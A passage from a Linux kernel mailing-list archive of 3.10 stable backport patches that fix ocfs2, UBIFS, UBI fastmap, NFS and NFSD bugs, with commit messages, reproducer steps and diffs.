+	} else if (!lock->convert_pending) {
+		mlog(0, "%s: res %.*s, owner died and lock has been moved back "
+				"to granted list, retry convert.\n",
+				dlm->name, res->lockname.len, res->lockname.name);
 		status = DLM_RECOVERING;
 	}
+
+	lock->convert_pending = 0;
 bail:
 	spin_unlock(&res->spinlock);
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 162/319] ocfs2: fix start offset to ocfs2_zero_range_for_truncate()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (60 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 161/319] ocfs2/dlm: fix race between convert and migration Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 163/319] ubifs: Fix assertion in layout_in_gaps() Willy Tarreau
                   ` (156 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Ashish Samant, Mark Fasheh, Joel Becker, Junxiao Bi, Joseph Qi,
	Eric Ren, Andrew Morton, Linus Torvalds, Willy Tarreau

From: Ashish Samant <ashish.samant@oracle.com>

commit d21c353d5e99c56cdd5b5c1183ffbcaf23b8b960 upstream.

If we punch a hole on a reflink such that the following conditions are met:

1. start offset is on a cluster boundary
2. end offset is not on a cluster boundary
3. (end offset is somewhere in another extent) or
   (hole range > MAX_CONTIG_BYTES(1MB)),

we don't COW the first cluster starting at the start offset.  But in
this case, we were wrongly passing this cluster to
ocfs2_zero_range_for_truncate() to zero out.  This will modify the
cluster in place and zero it in the source too.

Fix this by skipping this cluster in such a scenario.
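
The alignment arithmetic behind the fix can be sketched in userspace C.
first_zero_range_end() is a hypothetical helper that mirrors how tmpend
is computed in the diff below; it assumes the cluster size is a power
of two.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Return the end offset of the first partial-cluster range to zero,
 * or 0 when start is cluster aligned and that range must be skipped.
 */
static uint64_t first_zero_range_end(uint64_t start, uint64_t len,
				     uint64_t csize)
{
	uint64_t end = start + len;
	uint64_t tmpend = 0;

	/* The mask tricks below only work for power-of-two sizes. */
	assert(csize != 0 && (csize & (csize - 1)) == 0);

	if ((start & (csize - 1)) != 0) {
		/* Byte offset of the end of the cluster containing start. */
		tmpend = csize + (start & ~(csize - 1));
		if (tmpend > end)
			tmpend = end;
	}
	return tmpend;
}
```

For the reproducer below (offset 0, length 1048615) the helper returns
0, so the first cluster is left alone.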

To reproduce:

1. Create a random file of, say, 10 MB
     xfs_io -c 'pwrite -b 4k 0 10M' -f 10MBfile
2. Reflink it
     reflink -f 10MBfile reflnktest
3. Punch a hole starting at a cluster boundary with a range greater than
1MB. You can also use a range that will put the end offset in another
extent.
     fallocate -p -o 0 -l 1048615 reflnktest
4. sync
5. Check the first cluster in the source file. (It will be zeroed out.)
    dd if=10MBfile iflag=direct bs=<cluster size> count=1 | hexdump -C

Link: http://lkml.kernel.org/r/1470957147-14185-1-git-send-email-ashish.samant@oracle.com
Signed-off-by: Ashish Samant <ashish.samant@oracle.com>
Reported-by: Saar Maoz <saar.maoz@oracle.com>
Reviewed-by: Srinivas Eeda <srinivas.eeda@oracle.com>
Cc: Mark Fasheh <mfasheh@versity.com>
Cc: Joel Becker <jlbec@evilplan.org>
Cc: Junxiao Bi <junxiao.bi@oracle.com>
Cc: Joseph Qi <joseph.qi@huawei.com>
Cc: Eric Ren <zren@suse.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ocfs2/file.c | 34 ++++++++++++++++++++++++----------
 1 file changed, 24 insertions(+), 10 deletions(-)

diff --git a/fs/ocfs2/file.c b/fs/ocfs2/file.c
index d0e8c0b..496af7f 100644
--- a/fs/ocfs2/file.c
+++ b/fs/ocfs2/file.c
@@ -1499,7 +1499,8 @@ static int ocfs2_zero_partial_clusters(struct inode *inode,
 				       u64 start, u64 len)
 {
 	int ret = 0;
-	u64 tmpend, end = start + len;
+	u64 tmpend = 0;
+	u64 end = start + len;
 	struct ocfs2_super *osb = OCFS2_SB(inode->i_sb);
 	unsigned int csize = osb->s_clustersize;
 	handle_t *handle;
@@ -1531,18 +1532,31 @@ static int ocfs2_zero_partial_clusters(struct inode *inode,
 	}
 
 	/*
-	 * We want to get the byte offset of the end of the 1st cluster.
+	 * If start is on a cluster boundary and end is somewhere in another
+	 * cluster, we have not COWed the cluster starting at start, unless
+	 * end is also within the same cluster. So, in this case, we skip this
+	 * first call to ocfs2_zero_range_for_truncate() truncate and move on
+	 * to the next one.
 	 */
-	tmpend = (u64)osb->s_clustersize + (start & ~(osb->s_clustersize - 1));
-	if (tmpend > end)
-		tmpend = end;
+	if ((start & (csize - 1)) != 0) {
+		/*
+		 * We want to get the byte offset of the end of the 1st
+		 * cluster.
+		 */
+		tmpend = (u64)osb->s_clustersize +
+			(start & ~(osb->s_clustersize - 1));
+		if (tmpend > end)
+			tmpend = end;
 
-	trace_ocfs2_zero_partial_clusters_range1((unsigned long long)start,
-						 (unsigned long long)tmpend);
+		trace_ocfs2_zero_partial_clusters_range1(
+			(unsigned long long)start,
+			(unsigned long long)tmpend);
 
-	ret = ocfs2_zero_range_for_truncate(inode, handle, start, tmpend);
-	if (ret)
-		mlog_errno(ret);
+		ret = ocfs2_zero_range_for_truncate(inode, handle, start,
+						    tmpend);
+		if (ret)
+			mlog_errno(ret);
+	}
 
 	if (tmpend < end) {
 		/*
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 163/319] ubifs: Fix assertion in layout_in_gaps()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (61 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 162/319] ocfs2: fix start offset to ocfs2_zero_range_for_truncate() Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 164/319] ubifs: Fix xattr_names length in exit paths Willy Tarreau
                   ` (155 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Vincent Stehlé, Artem Bityutskiy, Richard Weinberger, Willy Tarreau

From: Vincent Stehlé <vincent.stehle@intel.com>

commit c0082e985fdf77b02fc9e0dac3b58504dcf11b7a upstream.

An assertion in layout_in_gaps() verifies that the gap_lebs pointer is
below the maximum bound. When computing this maximum bound, the idx_lebs
count is multiplied by sizeof(int), even though C pointer arithmetic
already scales by the size of the pointed-to elements implicitly. Remove
the multiplication to fix the assertion.
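
The scaling problem can be reproduced in user space. What follows is a
minimal sketch under stated assumptions, not UBIFS code: IDX_LEBS,
storage, in_bounds_old() and in_bounds_new() are hypothetical names, and
the backing array is deliberately oversized so that even the wrong bound
is a valid pointer to compare against.

```c
#include <assert.h>
#include <stddef.h>

#define IDX_LEBS 4	/* hypothetical count, stands in for c->lst.idx_lebs */

/* Oversized on purpose: the old bound must still point into the array. */
static int storage[IDX_LEBS * sizeof(int) + 1];

/* Old check: the count is scaled by sizeof(int) a second time. */
static int in_bounds_old(const int *p)
{
	return p < storage + sizeof(int) * IDX_LEBS;
}

/* Fixed check: pointer arithmetic on an int * already counts in ints. */
static int in_bounds_new(const int *p)
{
	return p < storage + IDX_LEBS;
}
```

With these definitions, a pointer one past the logical end
(storage + IDX_LEBS) is rejected by the fixed check but still accepted by
the old one whenever sizeof(int) is larger than 1.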

Fixes: 1e51764a3c2ac05a ("UBIFS: add new flash file system")
Signed-off-by: Vincent Stehlé <vincent.stehle@intel.com>
Cc: Artem Bityutskiy <artem.bityutskiy@linux.intel.com>
Signed-off-by: Artem Bityutskiy <artem.bityutskiy@linux.intel.com>
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ubifs/tnc_commit.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/fs/ubifs/tnc_commit.c b/fs/ubifs/tnc_commit.c
index 52a6559..3f620c0 100644
--- a/fs/ubifs/tnc_commit.c
+++ b/fs/ubifs/tnc_commit.c
@@ -370,7 +370,7 @@ static int layout_in_gaps(struct ubifs_info *c, int cnt)
 
 	p = c->gap_lebs;
 	do {
-		ubifs_assert(p < c->gap_lebs + sizeof(int) * c->lst.idx_lebs);
+		ubifs_assert(p < c->gap_lebs + c->lst.idx_lebs);
 		written = layout_leb_in_gaps(c, p);
 		if (written < 0) {
 			err = written;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 164/319] ubifs: Fix xattr_names length in exit paths
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (62 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 163/319] ubifs: Fix assertion in layout_in_gaps() Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 165/319] UBIFS: Fix possible memory leak in ubifs_readdir() Willy Tarreau
                   ` (154 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Richard Weinberger, Willy Tarreau

From: Richard Weinberger <richard@nod.at>

commit 843741c5778398ea67055067f4cc65ae6c80ca0e upstream.

When the operation fails we also have to undo the changes
we made to ->xattr_names. Otherwise listxattr() will report
wrong lengths.
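
The rollback rule can be illustrated with a small user-space model. This
is only a sketch: struct host_model and create_xattr_model() are
hypothetical, the size accounting is simplified (no CALC_DENT_SIZE() or
CALC_XATTR_BYTES()), and the fail flag stands in for whatever step fails
after the counters were updated.

```c
#include <assert.h>
#include <errno.h>

/* Hypothetical stand-in for the per-inode xattr accounting fields. */
struct host_model {
	int xattr_cnt;
	int xattr_size;
	int xattr_names;
};

/* Update the accounting first, then undo all of it if the operation fails. */
static int create_xattr_model(struct host_model *h, int name_len,
			      int value_size, int fail)
{
	h->xattr_cnt += 1;
	h->xattr_size += name_len + value_size;
	h->xattr_names += name_len;

	if (!fail)
		return 0;

	/* Error path: every field touched above is restored, names included. */
	h->xattr_cnt -= 1;
	h->xattr_size -= name_len + value_size;
	h->xattr_names -= name_len;
	return -EIO;
}
```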

Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ubifs/xattr.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/fs/ubifs/xattr.c b/fs/ubifs/xattr.c
index 0f7139b..69a42f3 100644
--- a/fs/ubifs/xattr.c
+++ b/fs/ubifs/xattr.c
@@ -167,6 +167,7 @@ out_cancel:
 	host_ui->xattr_cnt -= 1;
 	host_ui->xattr_size -= CALC_DENT_SIZE(nm->len);
 	host_ui->xattr_size -= CALC_XATTR_BYTES(size);
+	host_ui->xattr_names -= nm->len;
 	mutex_unlock(&host_ui->ui_mutex);
 out_free:
 	make_bad_inode(inode);
@@ -514,6 +515,7 @@ out_cancel:
 	host_ui->xattr_cnt += 1;
 	host_ui->xattr_size += CALC_DENT_SIZE(nm->len);
 	host_ui->xattr_size += CALC_XATTR_BYTES(ui->data_len);
+	host_ui->xattr_names += nm->len;
 	mutex_unlock(&host_ui->ui_mutex);
 	ubifs_release_budget(c, &req);
 	make_bad_inode(inode);
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 165/319] UBIFS: Fix possible memory leak in ubifs_readdir()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (63 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 164/319] ubifs: Fix xattr_names length in exit paths Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 166/319] ubifs: Abort readdir upon error Willy Tarreau
                   ` (153 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Richard Weinberger, Willy Tarreau

From: Richard Weinberger <richard@nod.at>

commit aeeb14f763917ccf639a602cfbeee6957fd944a2 upstream.

If ubifs_tnc_next_ent() returns anything other than -ENOENT,
we leak file->private_data.

Signed-off-by: Richard Weinberger <richard@nod.at>
Reviewed-by: David Gstir <david@sigma-star.at>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ubifs/dir.c | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c
index 605af51..879242b 100644
--- a/fs/ubifs/dir.c
+++ b/fs/ubifs/dir.c
@@ -467,13 +467,14 @@ static int ubifs_readdir(struct file *file, void *dirent, filldir_t filldir)
 	}
 
 out:
+	kfree(file->private_data);
+	file->private_data = NULL;
+
 	if (err != -ENOENT) {
 		ubifs_err("cannot find next direntry, error %d", err);
 		return err;
 	}
 
-	kfree(file->private_data);
-	file->private_data = NULL;
 	/* 2 is a special value indicating that there are no more direntries */
 	file->f_pos = 2;
 	return 0;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 166/319] ubifs: Abort readdir upon error
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (64 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 165/319] UBIFS: Fix possible memory leak in ubifs_readdir() Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 167/319] ubifs: Fix regression in ubifs_readdir() Willy Tarreau
                   ` (152 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Richard Weinberger, Willy Tarreau

From: Richard Weinberger <richard@nod.at>

commit c83ed4c9dbb358b9e7707486e167e940d48bfeed upstream.

If UBIFS hits an error while walking a directory, it reports the error
and ubifs_readdir() returns the error code. But the VFS readdir logic
does not make the getdents system call fail in all cases. When the
readdir cursor indicates that more entries are present, the system call
will just return and the libc wrapper will try again since it also
knows that more entries are present.
This causes the libc wrapper to busy-loop forever when a directory is
corrupted on UBIFS.
A common approach to dealing with corrupted directory entries is to
skip them by setting the cursor to the next entry. On UBIFS this
approach is not possible since we cannot compute the next directory
entry cursor position without reading the current entry. So all we can
do is set the cursor to the "no more entries" position and make
getdents exit.
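
The retry behaviour can be modelled in user space. The sketch below is a
deliberately simplified model, not VFS or libc code: struct dir_model,
readdir_model() and calls_until_done() are hypothetical, the caller loop
only mimics "retry while the cursor says more entries exist", and
max_calls bounds what would otherwise be an endless loop.

```c
#include <assert.h>
#include <errno.h>

#define POS_END 2	/* per the patch: f_pos == 2 means no more direntries */

struct dir_model {
	long pos;	/* cursor, stands in for file->f_pos */
	int corrupted;	/* non-zero: reading the next entry fails */
};

/* One readdir call. abort_on_error selects the behaviour after the fix. */
static int readdir_model(struct dir_model *d, int abort_on_error)
{
	if (d->pos == POS_END)
		return 0;
	if (d->corrupted) {
		if (abort_on_error)
			d->pos = POS_END;	/* give up on the directory */
		return -EIO;
	}
	d->pos = POS_END;	/* healthy directory: all entries consumed */
	return 0;
}

/* Caller that retries as long as the cursor claims more entries exist. */
static int calls_until_done(struct dir_model *d, int abort_on_error,
			    int max_calls)
{
	int calls = 0;

	while (d->pos != POS_END && calls < max_calls) {
		readdir_model(d, abort_on_error);
		calls++;
	}
	return calls;
}
```

In this model a corrupted directory exhausts max_calls when the cursor is
left untouched, and finishes after a single call once the cursor is moved
to POS_END on error.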

Signed-off-by: Richard Weinberger <richard@nod.at>
[wt: adjusted context]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ubifs/dir.c | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)

diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c
index 879242b..27b2c23 100644
--- a/fs/ubifs/dir.c
+++ b/fs/ubifs/dir.c
@@ -348,7 +348,8 @@ static unsigned int vfs_dent_type(uint8_t type)
  */
 static int ubifs_readdir(struct file *file, void *dirent, filldir_t filldir)
 {
-	int err, over = 0;
+	int err = 0;
+	int over = 0;
 	loff_t pos = file->f_pos;
 	struct qstr nm;
 	union ubifs_key key;
@@ -470,14 +471,12 @@ out:
 	kfree(file->private_data);
 	file->private_data = NULL;
 
-	if (err != -ENOENT) {
+	if (err != -ENOENT)
 		ubifs_err("cannot find next direntry, error %d", err);
-		return err;
-	}
 
 	/* 2 is a special value indicating that there are no more direntries */
 	file->f_pos = 2;
-	return 0;
+	return err;
 }
 
 static loff_t ubifs_dir_llseek(struct file *file, loff_t offset, int whence)
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 167/319] ubifs: Fix regression in ubifs_readdir()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (65 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 166/319] ubifs: Abort readdir upon error Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 168/319] UBI: fastmap: scrub PEB when bitflips are detected in a free PEB EC header Willy Tarreau
                   ` (151 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Richard Weinberger, Willy Tarreau

From: Richard Weinberger <richard@nod.at>

commit a00052a296e54205cf238c75bd98d17d5d02a6db upstream.

Commit c83ed4c9dbb35 ("ubifs: Abort readdir upon error") broke
overlayfs support because the fix exposed an internal error
code to VFS.

Reported-by: Peter Rosin <peda@axentia.se>
Tested-by: Peter Rosin <peda@axentia.se>
Reported-by: Ralph Sennhauser <ralph.sennhauser@gmail.com>
Tested-by: Ralph Sennhauser <ralph.sennhauser@gmail.com>
Fixes: c83ed4c9dbb35 ("ubifs: Abort readdir upon error")
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ubifs/dir.c | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c
index 27b2c23..db364d4 100644
--- a/fs/ubifs/dir.c
+++ b/fs/ubifs/dir.c
@@ -473,6 +473,14 @@ out:
 
 	if (err != -ENOENT)
 		ubifs_err("cannot find next direntry, error %d", err);
+	else
+		/*
+		 * -ENOENT is a non-fatal error in this context, the TNC uses
+		 * it to indicate that the cursor moved past the current directory
+		 * and readdir() has to stop.
+		 */
+		err = 0;
+
 
 	/* 2 is a special value indicating that there are no more direntries */
 	file->f_pos = 2;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 168/319] UBI: fastmap: scrub PEB when bitflips are detected in a free PEB EC header
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (66 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 167/319] ubifs: Fix regression in ubifs_readdir() Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 169/319] NFSv4.x: Fix a refcount leak in nfs_callback_up_net Willy Tarreau
                   ` (150 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Boris Brezillon, Richard Weinberger, Willy Tarreau

From: Boris Brezillon <boris.brezillon@free-electrons.com>

commit ecbfa8eabae9cd73522d1d3d15869703c263d859 upstream.

scan_pool() does not mark the PEB for scrubbing when bitflips are
detected in the EC header of a free PEB (VID header region left at
0xff).
Make sure we scrub the PEB in this case.

Signed-off-by: Boris Brezillon <boris.brezillon@free-electrons.com>
Fixes: dbb7d2a88d2a ("UBI: Add fastmap core")
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/mtd/ubi/fastmap.c | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/drivers/mtd/ubi/fastmap.c b/drivers/mtd/ubi/fastmap.c
index bf8108d..f6f1604 100644
--- a/drivers/mtd/ubi/fastmap.c
+++ b/drivers/mtd/ubi/fastmap.c
@@ -438,10 +438,11 @@ static int scan_pool(struct ubi_device *ubi, struct ubi_attach_info *ai,
 			unsigned long long ec = be64_to_cpu(ech->ec);
 			unmap_peb(ai, pnum);
 			dbg_bld("Adding PEB to free: %i", pnum);
+
 			if (err == UBI_IO_FF_BITFLIPS)
-				add_aeb(ai, free, pnum, ec, 1);
-			else
-				add_aeb(ai, free, pnum, ec, 0);
+				scrub = 1;
+
+			add_aeb(ai, free, pnum, ec, scrub);
 			continue;
 		} else if (err == 0 || err == UBI_IO_BITFLIPS) {
 			dbg_bld("Found non empty PEB:%i in pool", pnum);
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 169/319] NFSv4.x: Fix a refcount leak in nfs_callback_up_net
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (67 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 168/319] UBI: fastmap: scrub PEB when bitflips are detected in a free PEB EC header Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 170/319] NFSD: Using free_conn free connection Willy Tarreau
                   ` (149 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Trond Myklebust, Willy Tarreau

From: Trond Myklebust <trond.myklebust@primarydata.com>

commit 98b0f80c2396224bbbed81792b526e6c72ba9efa upstream.

On error, the callers expect us to return without bumping
nn->cb_users[].

Signed-off-by: Trond Myklebust <trond.myklebust@primarydata.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/nfs/callback.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/fs/nfs/callback.c b/fs/nfs/callback.c
index e05c96e..57d3b5e 100644
--- a/fs/nfs/callback.c
+++ b/fs/nfs/callback.c
@@ -302,6 +302,7 @@ static int nfs_callback_up_net(int minorversion, struct svc_serv *serv, struct n
 err_socks:
 	svc_rpcb_cleanup(serv, net);
 err_bind:
+	nn->cb_users[minorversion]--;
 	dprintk("NFS: Couldn't create callback socket: err = %d; "
 			"net = %p\n", ret, net);
 	return ret;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 170/319] NFSD: Using free_conn free connection
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (68 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 169/319] NFSv4.x: Fix a refcount leak in nfs_callback_up_net Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 171/319] NFS: Don't drop CB requests with invalid principals Willy Tarreau
                   ` (148 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Kinglong Mee, J . Bruce Fields, Willy Tarreau

From: Kinglong Mee <kinglongmee@gmail.com>

commit 3f42d2c428c724212c5f4249daea97e254eb0546 upstream.

A connection obtained from alloc_conn() must be freed through
free_conn(); otherwise the reference to svc_xprt will never be put.

Signed-off-by: Kinglong Mee <kinglongmee@gmail.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/nfsd/nfs4state.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
index 4a58afa..b0878e1 100644
--- a/fs/nfsd/nfs4state.c
+++ b/fs/nfsd/nfs4state.c
@@ -2193,7 +2193,8 @@ out:
 	if (!list_empty(&clp->cl_revoked))
 		seq->status_flags |= SEQ4_STATUS_RECALLABLE_STATE_REVOKED;
 out_no_session:
-	kfree(conn);
+	if (conn)
+		free_conn(conn);
 	spin_unlock(&nn->client_lock);
 	return status;
 out_put_session:
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 171/319] NFS: Don't drop CB requests with invalid principals
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (69 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 170/319] NFSD: Using free_conn free connection Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 172/319] NFSv4: Open state recovery must account for file permission changes Willy Tarreau
                   ` (147 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Chuck Lever, Anna Schumaker, Willy Tarreau

From: Chuck Lever <chuck.lever@oracle.com>

commit a4e187d83d88eeaba6252aac0a2ffe5eaa73a818 upstream.

Before commit 778be232a207 ("NFS do not find client in NFSv4
pg_authenticate"), the Linux callback server replied with
RPC_AUTH_ERROR / RPC_AUTH_BADCRED, instead of dropping the CB
request. Let's restore that behavior so the server has a chance to
do something useful about it, and provide a warning that helps
admins correct the problem.

Fixes: 778be232a207 ("NFS do not find client in NFSv4 ...")
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Tested-by: Steve Wise <swise@opengridcomputing.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/nfs/callback_xdr.c | 6 +++++-
 net/sunrpc/svc.c      | 5 +++++
 2 files changed, 10 insertions(+), 1 deletion(-)

diff --git a/fs/nfs/callback_xdr.c b/fs/nfs/callback_xdr.c
index e98ecf8..7f7a89a 100644
--- a/fs/nfs/callback_xdr.c
+++ b/fs/nfs/callback_xdr.c
@@ -884,7 +884,7 @@ static __be32 nfs4_callback_compound(struct svc_rqst *rqstp, void *argp, void *r
 	if (hdr_arg.minorversion == 0) {
 		cps.clp = nfs4_find_client_ident(SVC_NET(rqstp), hdr_arg.cb_ident);
 		if (!cps.clp || !check_gss_callback_principal(cps.clp, rqstp))
-			return rpc_drop_reply;
+			goto out_invalidcred;
 	}
 
 	hdr_res.taglen = hdr_arg.taglen;
@@ -911,6 +911,10 @@ static __be32 nfs4_callback_compound(struct svc_rqst *rqstp, void *argp, void *r
 	nfs_put_client(cps.clp);
 	dprintk("%s: done, status = %u\n", __func__, ntohl(status));
 	return rpc_success;
+
+out_invalidcred:
+	pr_warn_ratelimited("NFS: NFSv4 callback contains invalid cred\n");
+	return rpc_autherr_badcred;
 }
 
 /*
diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c
index 89a588b..6dee8fb 100644
--- a/net/sunrpc/svc.c
+++ b/net/sunrpc/svc.c
@@ -1187,6 +1187,11 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
 				procp->pc_release(rqstp, NULL, rqstp->rq_resp);
 			goto dropit;
 		}
+		if (*statp == rpc_autherr_badcred) {
+			if (procp->pc_release)
+				procp->pc_release(rqstp, NULL, rqstp->rq_resp);
+			goto err_bad_auth;
+		}
 		if (*statp == rpc_success &&
 		    (xdr = procp->pc_encode) &&
 		    !xdr(rqstp, resv->iov_base+resv->iov_len, rqstp->rq_resp)) {
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 172/319] NFSv4: Open state recovery must account for file permission changes
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (70 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 171/319] NFS: Don't drop CB requests with invalid principals Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 173/319] fs/seq_file: fix out-of-bounds read Willy Tarreau
                   ` (146 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Trond Myklebust, Anna Schumaker, Willy Tarreau

From: Trond Myklebust <trond.myklebust@primarydata.com>

commit 304020fe48c6c7fff8b5a38f382b54404f0f79d3 upstream.

If the file permissions change on the server, then we may not be able to
recover open state. If so, we need to ensure that we mark the file
descriptor appropriately.

Signed-off-by: Trond Myklebust <trond.myklebust@primarydata.com>
Tested-by: Oleg Drokin <green@linuxhacker.ru>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/nfs/nfs4state.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/fs/nfs/nfs4state.c b/fs/nfs/nfs4state.c
index 2bdaf57..7d45b38 100644
--- a/fs/nfs/nfs4state.c
+++ b/fs/nfs/nfs4state.c
@@ -1464,6 +1464,9 @@ restart:
 					"Zeroing state\n", __func__, status);
 			case -ENOENT:
 			case -ENOMEM:
+			case -EACCES:
+			case -EROFS:
+			case -EIO:
 			case -ESTALE:
